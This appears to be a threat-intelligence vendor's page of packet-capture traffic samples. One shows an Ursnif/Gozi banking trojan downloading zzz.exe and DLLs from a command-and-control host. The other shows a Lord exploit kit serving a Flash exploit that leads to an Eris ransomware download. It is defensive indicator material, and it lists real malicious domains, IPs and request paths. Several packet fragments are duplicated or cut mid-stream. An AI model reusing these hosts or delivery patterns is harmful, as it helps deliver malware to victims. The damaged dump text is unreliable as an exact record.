Text Example

zzz.exe Delivers Uzrsnif Gozi Malware Banking Trojan PCAP File Download Traffic Sample GET /mozglue.dll

Latest indicators of compromise from our our Ursnif IOC feed. Ursnif (aka Gozi, aka IFSB) is a banking trojan targeting users in the USA and Europe. It’s was designed for the primary purpose of perpetrating fraud.

Fast, accurate identification of commodity malware like Ursnif allows SOC teams to focus efforts on hunting for more highly targeted and stealthy malware. By quickly blocking, de-prioritizing and filtering out the noise associated with mass distributed malware and crimeware, our Threat Intelligence Feed allows you to focus on the threats that matter to your organization.

2019-10-03 06:01:00.812050 IP 192.168.86.25.53425 > 104.27.161.249.80: Flags [P.], seq 3229838630:3229839201, ack 2872661083, win 16450, length 571: HTTP: GET /tmp/zzz.exe HTTP/1.1
E..cS.@….&..V.h……P..m&.9T[P.@B1<..GET /tmp/zzz.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Range: bytes=120970-
Unless-Modified-Since: Thu, 03 Oct 2019 02:07:13 GMT
If-Range: “1e1000-593f80b3c67d3”
Host: redmoscow.info
Connection: Keep-Alive
Cookie: __cfduid=df482dfbd65d8b46f1c87aacc388aec4a1570096931

2019-10-03 06:01:04.855775 IP 104.27.161.249.80 > 192.168.86.25.53425: Flags [P.], seq 1848473:1849587, ack 571, win 30, length 1114: HTTP
E ..+.@.7…h…..V..P…U….oaP…g……………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………….
2019-10-03 06:01:19.120810 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 2196019561:2196020046, ack 311058881, win 16514, length 485: HTTP: POST /223 HTTP/1.1
E…U.@…….V.h.K….P…i..a.P.@…..POST /223 HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: keitbeschutzen.com
Connection: Keep-Alive
Cache-Control: no-cache

–1BEF0A57BE110FD467A–

2019-10-03 06:01:19.279627 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 1:314, ack 485, win 233, length 313: HTTP: HTTP/1.1 200 OK
E .a./@.1…h.K…V..P….a….NP…….HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2019 10:02:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip

5c
……….3.1.C. ..F..:…z…..M..].o……….c..WRQbmj`]RT.j.._..Zl.[Z..l.[l..5…R…
0

2019-10-03 06:01:19.284253 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 485:842, ack 314, win 16435, length 357: HTTP: GET /freebl3.dll HTTP/1.1
E…U.@…. ..V.h.K….P…N..b.P.@3q7..GET /freebl3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: keitbeschutzen.com
Connection: Keep-Alive
2019-10-03 06:01:20.010931 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 264538:265974, ack 842, win 242, length 1436: HTTP
E ….@.1…h.K…V..P….k…..P….^………… ……………B…….NIST-P521………………………………m………………………………………………………………………………… …~…).a|m~M=.L.Hw,………. ….c.X………………………………………………. …~…).a|m~M=.L.Hw,………. ….0……………….0…P…p……………….B… …….Curve25519…………………………………………………………Z.5..:…..Uv…e….S..;.<>’.Kk....,BG....c.@.w.}.-.3...9E....O.B........J|...+.3Wk1^...@h7.Q..............................c%Q......k....,BG....c.@.w.}.-.3...9E....O.B........J|...+.3Wk1^...@h7.Q...............<...\...|...........................B... ........................................................................................................1/..>.....k..-....n..A.....P..Z.V9.....*.....*...."...7..... .tn.;b....Y.A..T*8U..].U)l:T^8rv .6..J.&,o]......)....(..|..1..... …~..zC.|……………………….cM..7-.X…H..z…j..)s…..”…7….. .tn.;b….Y.A..T8U..].U)l:T^8rv .6..J.&,o]……)….(..|..1….. ...~..zC.|..._..………………………@…p……………b…0……………………………………………………………………………………………………………………………………..Q.>.a……!…@…r[………. .V.9Q.~.{.R..;…5s..=,4..E..kP?………………>.f#..B.d.9.?.!.(.kM=..K^w..Y(...'....3H...jB..~~1...f.... 2019-10-03 06:01:20.126700 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 330594:332030, ack 842, win 242, length 1436: HTTP E ....@.1...h.K...V..P....m"....P...N'..d.G.t7.....BH........v................0...0...U.#..0...Z..{* ...q...-.eu.X0…U………I……C.N.W9G…0…U………..0…U.%..0 ..+…….0w..U…p0n05.3.1./http://crl3.digicert.com/sha2-assured-cs-g1.crl05.3.1./http://crl4.digicert.com/sha2-assured-cs-g1.crl0L..U. .E0C07. .H...l..0*0(..+.........https://www.digicert.com/CPS0...g.....0....+........x0v0$..+.....0...http://ocsp.digicert.com0N..+.....0..Bhttp://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0...U.......0.0.. *.H.............CK.L .1"5.v.....=a. n.D<h.[....V.DV.4...YR....5........4D................Rl..!.W....\. :t[U........$..V{.q..K3@.-(>...A.....l.T|p....zXf...-.&.R.1Ln...j$..l.,....j.q.....AUuV.k..'.P...f..m..T....[n.H{...c..*..TS.....fB.}l…&……q.’
L………x.Gf…N.0…0………….8…5n..j…P0.. *.H……..0^1.0 ..U….US1.0…U.
..Symantec Corporation100…U…’Symantec Time Stamping Services CA – G20…121018000000Z..201229235959Z0b1.0 ..U….US1.0…U.
..Symantec Corporation1402..U…+Symantec Time Stamping Services Signer – G40..”0.. *.H………….0..
……c.9D..#.DI…..a
S…..,.J.n….K..c…2[.^.Z..(P…..a;EQ…V..G….f=G.pr…
…..d…%….”….z.w.[e…t.A…L….-.wD.h..tw..[2.V.3..c.I.:…3……….W.;…z”.$…p..N.&…..O….(r……….W0..S0…U…….0.0…U.%…..0
..+…….0…U………..0s..+……..g0e0*..+…..0…http://ts
2019-10-03 06:01:20.126720 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 334902:334952, ack 842, win 242, length 50: HTTP
E .Z..@.1…h.K…V..P….}…..P…e%..#j:…..9]…..’…..XC…#.#..+..9.,..I^.>….h..
2019-10-03 06:01:20.127904 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 842:1199, ack 334952, win 65047, length 357: HTTP: GET /mozglue.dll HTTP/1.1
E…Ur@…….V.h.K….P……~(P….b..GET /mozglue.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: keitbeschutzen.com
Connection: Keep-Alive
2019-10-03 06:01:20.253950 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 471372:472470, ack 1199, win 250, length 1098: HTTP
E .r.z@.1…h.K…V..P……….P…t2……7…1.0…..http://www.mozilla.com0.. *.H…………<“…q7.F..u.1….’ep......e....5N.-,..E…8…jK!…….. .yx.…R..bX:..v5…{.lh…5.u….~..~C……(.uxv..R3?r..&…VA..=c..m..$..Q. ……..?.4..q.oU.]…}..W[;..:..-..$../V ..w..9.2.ZoT.NO….[T….1..0T……?+…..m,%.5;..].j..e3/..]..). ..(c....Ls..….D.X.?….W…C…)…..Z.t..l…+…..(……….S..A.~uJ....-…..|…%.^.|.^]k.0.-J..fX0+………..2.R..y……..k.$….u.l|rC.p…….”………….6….O..’W+Z….%…4……<.R………0…. *.H…. .1…0……0r0^1.0 ..U….US1.0…U. ..Symantec Corporation100…U…’Symantec Time Stamping Services CA – G2…..8…5n..j…P0 ..+…….]0.. *.H…. .1.. *.H……0.. *.H…. .1…181114000811Z0#. *.H…. .1….$..b………..3=(.0.. *.H………… l. ……o…@y…c..TBT……pJ..g”&.AI.|./xO.G…k….”…….K.EX.I….7…..u…n…w|.X.}..L..#G….,3…B..K&.~..Y..W…..r9..fH.c..r.=.U[6H….F..S|.dC[}.5j…..s.4.b. Bv..N^H..9..r.w.v.u:….)…0.!..qu..[..E.Z….`.. M.E<.CjL.56…e_..h.5…. 2019-10-03 06:01:20.255368 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 1199:1557, ack 472470, win 65338, length 358: HTTP: GET /msvcp140.dll HTTP/1.1
E…U.@…….V.h.K….P…….VP..:.O..GET /msvcp140.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
ESCOC

..M…t…..d……….Y………E.P…….Y………E.P…….Y………E.P…….Y….q….E.P…….Y….]….E.P…….Y….I….E.P.y…..Y….5…..x…P.b…..Y……….h…P.K…..Y……….X…P.4…..Y………}..t>..t:.C.@
…YY……E…3.[].U……M.3.W.E…..E..E..A… Y..tM.u..u.P…………..t’…t….t…….u$Sj.j:..Sj.j…Sj.j…Sj.j..`………{d.[u.h…. 2, length 1112: HTTP ………….A………..A..E…………..A..E…………..A………….A…………..A……………….A .E…………..A ….V.K..M.W…}……s.3..u…..-QV.u..7……..u8.M….D..0.2Bj.X;.r.+.+.+.;..M.w..].;M.u$QVS……….t……..;….0.7G…r…….3..u…..^[..].U..SVW.}…t$.]..u.+.V..3P.u………..u…….u.3._^[]……U……M..E.SV…q.3..X.
2, length 1436: HTTP
..m………………………………………………………………………………… …~…).a|m~M=.L.Hw,………. ….c.X………………………………………………. …~…).a|m~M=.L.Hw,………. ….0…

……………………………………………………………………………………………Q.>.a……!…@…r[………. .V.9Q.~.{.R..;…5s..=,4..E..kP?………………>.f#..B.d.9.?.!.(.`kM=..K^w..Y(…’….3H…jB
2, length 1436: HTTP

ured-cs-g1.crl0L..U. .E0C07. `.H…l..0*0(..+………https://www.digicert.com/CPS0…g…..0….+……..x0v0$..+…..0…http://ocsp.digicert.com0N..+…..0..Bhttp://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0.

.zXf…-.&.R.1Ln…j$..l.,….j.q…..AUuV.k..’.P…f..m..T….[n.H{…c....TS…..fB.`}l…&……q.’

..US1.0…U.

=G.pr…_…..d…%….”….z.w.[e…t.A.*..L….-.wD.h..tw..[2.V.3..c.I.:…3……….W.;…z”.$…p..N.&…..O….(r……….W0..S0…U…….0.0…U.%…..0

2, length 50: HTTP

7, length 357: HTTP: GET /mozglue.dll HTTP/1.1

/*;q=0.1

2019-10-03 06:01:20.255368 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 1199:1557, ack 472470, win 65338, length 358: HTTP: GET /msvcp140.dll HTTP/1.1
E…U.@…….V.h.K….P…….VP..:.O..GET /msvcp140.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: keitbeschutzen.com
Connection: Keep-Alive

2019-10-03 06:01:20.626528 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 912210:912940, ack 1557, win 258, length 730: HTTP
E ….@.1…h.K…V..P….M….~P….R..0…U…
Washington1.0…U….Redmond1.0…U.
..Microsoft Corporation1&0$..U….Microsoft Time-Stamp PCA 2010..3….L….!|…….0.. .H.e.........20.. *.H.... .1...*.H.... ...0/. *.H.... .1". .a..T.Gv ...P.^......p.......=..0....*.H.... ...1..0..0..0....^/..q..2...^J;.N....0..0...~0|1.0 ..U....US1.0...U... Washington1.0...U....Redmond1.0...U. ..Microsoft Corporation1&0$..U....Microsoft Time-Stamp PCA 2010..3....L....!|.......0...........J.m0..:.5B..0.. *.H............VQ.l......Wl.$.......v..-&>r%..2..MB.+....mn..Iz...^.) . ...UT..xS#{..;u 2...]q..Y;u........_.gD.a@.&...... .*...F....U..W.-/..&y.X…E.p.K.u….Y..I3…Z….r…g…q…Ut..&…..XQ……r.JB#..1..E…..o…f…………=.%5..B.k..n..>…….D…5..w…3
2019-10-03 06:01:20.627701 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 1557:1911, ack 912940, win 65338, length 354: HTTP: GET /nss3.dll HTTP/1.1
E…V#@…….V.h.K….P…~..O.P..:….GET /nss3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: keitbeschutzen.com
Connection: Keep-Alive

2019-10-03 06:01:21.378227 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 2159388:2159452, ack 1911, win 267, length 64: HTTP
E .h..@.1…h.K…V..P….T…..P….{…….!FjJ.h5.Ej._……….6V.f..0….[?.D.@..#1…j……….. 2019-10-03 06:01:21.379453 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 1911:2269, ack 2159452, win 65322, length 358: HTTP: GET /softokn3.dll HTTP/1.1 E…Wt@…….V.h.K….P……U.P..….GET /softokn3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: keitbeschutzen.com
Connection: Keep-Alive

2019-10-03 06:01:21.529860 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 2304488:2304650, ack 2269, win 275, length 162: HTTP
E …{@.1..Ih.K…V..P………FP…….i.-}d…Z…`…….w&.{.c.d.+l…x.vx..R..r….]…k.9…9..1…K…..U…f.dz..%R…….h.^.t.,..u.%MK>.e……>…6…..K..)Z.Qjn*.L.m9..-………..=p.0./…
2019-10-03 06:01:21.530760 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 2269:2631, ack 2304650, win 65338, length 362: HTTP: GET /vcruntime140.dll HTTP/1.1
E…W.@…….V.h.K….P…F…JP..:5;..GET /vcruntime140.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: keitbeschutzen.com
Connection: Keep-Alive

2019-10-03 06:01:21.660746 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 2387938:2388783, ack 2631, win 283, length 845: HTTP
E .u..@.1..ch.K…V..P……….P…’I..nV…B…….T.4&…X!^&…..
…..t.BY^…h.o..#r;:u.a..H..k……WcG=…….$…?.1…0……0..0|1.0 ..U….US1.0…U…
Washington1.0…U….Redmond1.0…U.
..Microsoft Corporation1&0$..U….Microsoft Time-Stamp PCA 2010..3….C:….R…….0.. .H.e.........20.. *.H.... .1...*.H.... ...0/. *.H.... .1". ..inH....'.......H..^.j..#:k..G)0....*.H.... ...1..0..0..0..........Nn..u...Q.. m:0..0...~0|1.0 ..U....US1.0...U... Washington1.0...U....Redmond1.0...U. ..Microsoft Corporation1&0$..U....Microsoft Time-Stamp PCA 2010..3....C:....R.......0.......fc.r..).........0.. *.H..............U.$"...... E...V...E.k.}.N…^….)..;…g%…..l..L..9.}.)..1..&.v……k.N:r….SVx;..xv…i.p…..p..2z..:..Qk_..v..l..b…K……j..}..Z..r.O}..-.{@…..$K….M.?h….%.t…..j.v…cK…….r.Yf.fZ”e.e.G…..x….k4.1..hfK.3……./(………..&bJ
2019-10-03 06:01:21.989504 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 2387938:2388783, ack 2631, win 283, length 845: HTTP
E .u..@.1..bh.K…V..P……….P…’I..nV…B…….T.4&…X!^&…..
…..t.BY^…h.o..#r;:u.a..H..k……WcG=…….$…?.1…0……0..0|1.0 ..U….US1.0…U…
Washington1.0…U….Redmond1.0…U.

Lord Exploit Kit Exploiting Flash Vulnerability Delivering Eris Ransomware PCAP File Download Traffic Sample

2019-08-02 10:46:29.501586 IP 10.8.2.101.49160 > 3.14.212.173.80: Flags [P.], seq 1:326, ack 1, win 64240, length 325: HTTP: GET /?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3 HTTP/1.1
E..m.y@…..
..e…….PM….Hg.P…….GET /?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3 HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
DNT: 1
Connection: Keep-Alive
Host: 57189bbb.ngrok.io

2019-08-02 10:46:29.501716 IP 3.14.212.173.80 > 10.8.2.101.49160: Flags [.], ack 326, win 64240, length 0
E..(……U…..
..e.P…Hg.M..$P…l…
2019-08-02 10:46:29.666953 IP 3.14.212.173.80 > 10.8.2.101.49160: Flags [.], seq 1:1461, ack 326, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E………PB….
..e.P…Hg.M..$P…….HTTP/1.1 200 OK
Date: Fri, 02 Aug 2019 14:46:29 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked

4e91




2019-08-02 10:46:31.239216 IP 10.8.2.101.49160 > 3.14.212.173.80: Flags [.], ack 21872, win 64240, length 0
E..(..@…..
..e…….PM….H.tP…….
2019-08-02 10:46:31.297932 IP 10.8.2.101.49160 > 3.14.212.173.80: Flags [P.], seq 1799:2571, ack 21872, win 64240, length 772: HTTP: GET /?jS3YdHCaSi9dJ.swf HTTP/1.1
E..,..@…..
..e…….PM….H.tP…OC..GET /?jS3YdHCaSi9dJ.swf HTTP/1.1
Accept: /
Accept-Language: en-US
Referer: http://57189bbb.ngrok.io/?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3
x-flash-version: 28,0,0,161
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 57189bbb.ngrok.io
DNT: 1
Connection: Keep-Alive
Cookie: session=MTU2NDc1NzE5MHxEdi1CQkFFQ180SUFBUkFCRUFBQV82UF9nZ0FFQm5OMGNtbHVad3dGQUFORFZrVUdjM1J5YVc1bkRBOEFEVU5XUlMweU1ERTRMVFE0TnpnR2MzUnlhVzVuREFVQUEweE9Td1p6ZEhKcGJtY01KZ0FrYUhSMGNEb3ZMemd4TGpFM01TNHpNUzR5TkRjNk5EVTJOeTlUWlhKMlpYSXVaWGhsQm5OMGNtbHVad3dGQUFORldGUUdjM1J5YVc1bkRBVUFBMU5YUmdaemRISnBibWNNQlFBRFEwWkhCbk4wY21sdVp3d0pBQWRGV0ZCTVQwbFV8UvNtvJ8thZ9a7XPixQ5K3TO4K2XLuH7VZ0nrU5jUKqU=

2019-08-02 10:46:31.298032 IP 3.14.212.173.80 > 10.8.2.101.49160: Flags [.], ack 2571, win 64240, length 0
E..(……U…..
..e.P…H.tM…P…….
2019-08-02 10:46:31.441240 IP 3.14.212.173.80 > 10.8.2.101.49160: Flags [.], seq 21872:23332, ack 2571, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E………P…..
..e.P…H.tM…P…+…HTTP/1.1 200 OK
Content-Type: application/x-shockwave-flash
Date: Fri, 02 Aug 2019 14:46:30 GMT
Transfer-Encoding: chunked

2475
FWS$u$..x……p…..D………..application/x-shockwave-flashAdobe Flex 4 Applicationhttp://www.adobe.com/products/flexujwkgkcujwkgkcENSep 15, 2014.D…<.C….Z
………..Z……….e….

2019-08-02 10:47:11.656373 IP 10.8.2.101.49175 > 3.14.212.173.80: Flags [P.], seq 1:724, ack 1, win 64240, length 723: HTTP: GET /?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3 HTTP/1.1
E…..@…..
..e…….PjTPv….P…>…GET /?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3 HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 57189bbb.ngrok.io
DNT: 1
Connection: Keep-Alive
Cookie: session=MTU2NDc1NzE5MHxEdi1CQkFFQ180SUFBUkFCRUFBQV82UF9nZ0FFQm5OMGNtbHVad3dGQUFORFZrVUdjM1J5YVc1bkRBOEFEVU5XUlMweU1ERTRMVFE0TnpnR2MzUnlhVzVuREFVQUEweE9Td1p6ZEhKcGJtY01KZ0FrYUhSMGNEb3ZMemd4TGpFM01TNHpNUzR5TkRjNk5EVTJOeTlUWlhKMlpYSXVaWGhsQm5OMGNtbHVad3dGQUFORldGUUdjM1J5YVc1bkRBVUFBMU5YUmdaemRISnBibWNNQlFBRFEwWkhCbk4wY21sdVp3d0pBQWRGV0ZCTVQwbFV8UvNtvJ8thZ9a7XPixQ5K3TO4K2XLuH7VZ0nrU5jUKqU=

2019-08-02 10:47:11.656449 IP 3.14.212.173.80 > 10.8.2.101.49175: Flags [.], ack 724, win 64240, length 0
E..(.R….PV….
..e.P……jTSIP….a..
2019-08-02 10:47:11.842604 IP 3.14.212.173.80 > 10.8.2.101.49175: Flags [P.], seq 1:189, ack 724, win 64240, length 188: HTTP: HTTP/1.1 302 Found
E….T….O…..
..e.P……jTSIP…I…HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
Location: http://google.com
Date: Fri, 02 Aug 2019 14:47:11 GMT
Content-Length: 40

Found.

2019-08-02 10:46:31.800847 IP 10.8.2.101.49164 > 81.171.31.247.4567: Flags [P.], seq 1:133, ack 1, win 64240, length 132
E…..@…{.
..eQ……….`.2.”P….+..GET /Server.exe HTTP/1.1
User-Agent: wininet
Host: 81.171.31.247:4567
DNT: 1
Connection: Keep-Alive
Cache-Control: no-cache

2019-08-02 10:46:31.800983 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [.], ack 133, win 64240, length 0
E..(……..Q…
..e…..2.”….P…G…
2019-08-02 10:46:31.977210 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [P.], seq 1:326, ack 133, win 64240, length 325
E..m……..Q…
..e…..2.”….P…….HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 1803776
Accept-Ranges: bytes
Server: HFS 2.3m
Set-Cookie: HFS_SID_=0.176216669380665; path=/; HttpOnly
ETag: 60A4822263437E51F0D4844D638C4DFA
Last-Modified: Fri, 02 Aug 2019 12:38:10 GMT
Content-Disposition: attachment; filename=”Server.exe”;

2019-08-02 10:46:34.864608 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [.], seq 601786:603246, ack 133, win 64240, length 1460
E………..Q…
..e…..;……P……..l..Sam9..".P.s...Y.\.D3....rU......}ZZs.>.….h.(…ax….2.9…Y..A… …….-…..,..|..X.s.@. .. ].....+<.%.p!.q.DD..I..,...x.5.XL..+D... a\....iN.e.L P.B.#%p………..Cg…e…J.i.>…..t….B…..% …..K……l..2…..X.L..9.A…..U.z.$4E1..1..#?.%..I(…C..……K..x…….ax|’S.....<.6.T...e........Q:D.....e..w.....O..g".(.....J.....c…/….$,#GL..I.,.’P..9.;..uC. ….@kB.. E..p.g(0’Hu.=…….. &P..I}………….!g…n..$.(.i….,@5i.dD…..5..}..cm$#.R.. …{..L.?4…3……@Qe…b…g…N..!C….D..M.F…v.0. S.Z….. …..E=. …F.]…M.L..&.4..5..)..f.M.yE.X.h…..SP…;…….Er..?…,…..N..~?T’Q..;..hA)…”….E…-…….B^….KR.H. ..Z..M…..L8………G..8.p.S..[………0.~~….h….:.u3..U)A.H……p!..4D9.z@h.BG.V..Z-…I.,.. .p….[j…..9..i….<.=..8I….R.~. ..e..m0]..4/..0…..#….Yu….E….I…N.Y.4……..J… E.J.[).(-..QD..n..Ko…,W..>=.+610..M.=(Y/fk.Ys…f…,)……3 z@.V..)..)……..!.-9Z..O.1….u.C..Y…f{….5….J…..F…Y..8…^. .A……….#…….7/.cW………….n…L..K……...b..t.;.p..T....\.,....(,.*..y..9./..Mli.c...[...$G^.f...(..XOo...k....X.A;.1: P...mNqB....=..e... ....s..: ...'.%[.T..|7.pUG…6…..P.u…..1(ob(.!{……T..L….Tz……..I……Y….I….V..tMT..G;.k..5t.a.I.|X P:AC’.G.[..c…j…….W…u…..!2e.@…A..0Pnk…RI.8….i….
O.[……
x|u..&.@+<..T.k@D.T,…….6@.r.,.7.>..DHc….J.uB….%.Z.B…t.(4…A…X7…….@q].…B[D…cU… 2019-08-02 10:46:34.864636 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [.], seq 603246:604706, ack 133, win 64240, length 1460 E………..Q… ..e…..;……P………. 54+0………L>……7Z…..%..m..Aj…I.TB..BM……L.p…. [.. …….m….1.jc…..|)J………n…k.S.y…..a.f..#,…..~.$..G.y.*2+.G.....S.z$E..~l....4P....U.LD.0X.\.C!.\> WRl......Xr...,... ..i..4J....UEHX_....R...H$.... BP..8.M$.o..0TEH_'...U....l...ri&..l…e…”$,b….j..” .L….[.. ……[F..l.K………^..T.2…D”.?.a!B…i…
/A.&7.EPG..a.B 8….* ..D:….A…&..s$ ..’. /...0).W.2...t*..E..3Z.)..7..8B...".5..1.8.*%L1....v..A.`.5.EIX......\P..<...@.t@...QC.u8 ..C.K..t0.0..M..V.rm...) ......G#...X.iv_.)+/<..u.%I.x.p....!,yQ/..R0.G..`...60.$Q.@N.....1y.;.. .4.....j...L.Cb.,.~2.......$;t.Q...w..@...!.d...*K.@f..[:.A..V..7.........A..... ...[...BJ.#....p.....Z 5_.4.2$........ttpP..W."s....w.S.. .y.Y36.xK.......:.\.....-.....7*.... .....!p.:!...R.i#,....92.d.C.......x...".......d.V..u....),"%.h]...a0..D....\..)..@aSS!t.4..V.(..04......[...IR@..H.!.F. .k]X.?.9..$...g.R.....-.3(.I...1 ..#&.@...i...b.B\%/.6.C..g...n..tEC6.>....t.A..t.fW........ockdC.Q.f bk...5.....?s..<.<....:..eJ_.9u.,.l.R..L...3.....Q..P.\.&..EX........OJ......e$3$...v|..3.hT..&._.-..,Q..m......e.. ..Z.L..m.ziv..X......o.7..5)=ls./;s..4ia...{QKD9.}R$ (.4..f.......Q..@.C..$M,...!....R#.. `_.....4[0..d )~......wH.6.$.S<,....C...,.y.gllll........M.P.3..). ..H....EZ.o {.$..T1...u..............$......C......M..A?.l..kO.QcK.C..S........ .#.$...?.(.0.s({.p..H.QB.....L.A.........B.<.5UCa.T.k$.k..C.=diMY...!Enq.h.GH1...,.\H"...u*.Q)....|.,......L....c.. M.E. 2019-08-02 10:46:34.864652 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [.], seq 604706:606166, ack 133, win 64240, length 1460 E...........Q... ..e.....;.C....P.......q.Y,2,\..$..Dl...@6.P.......*T...u.+L....E.0.(...(..(.".... . )...X.H......`Z!`=.....M.M,..ahI\.. .]. #P.Yw...0... j .jPs...j9......8"P...S..4..\.>..W.......h...M.l.I.B.=...*i..8l..L.4..b'. .u. P..-.2 .o0...:...#p.........@....(..tg:%C...H.mZ.....!(.C.....$al_..`j....gD....H........ ..5,RL,1.-tW..pX. .... ]..."$`...!.k...p.3 L$g.6...A..=..r-._,..`...!.B.....!.bR.....pH.{.P...........C.....!t...F.X.......b.`1......A..`.)E.P....*e...,...\..w..4.]..<".H.#.Z.A4/.....0t...?yu.=...i.....m...;..A...u..r.E.......)....M..]'rH.jY $ ..%.$....-6..z E....m..#....u....4..&P.4......zO...../...(dk...\8Y.+..0%L..."...K<0<V.P3.8&.C.....iy<..!J.#.........7X ..M"..........?ghAl@ _.G.....b...q/2!y.,.........U.uI.5%h..ex, F..F..,.).jC. 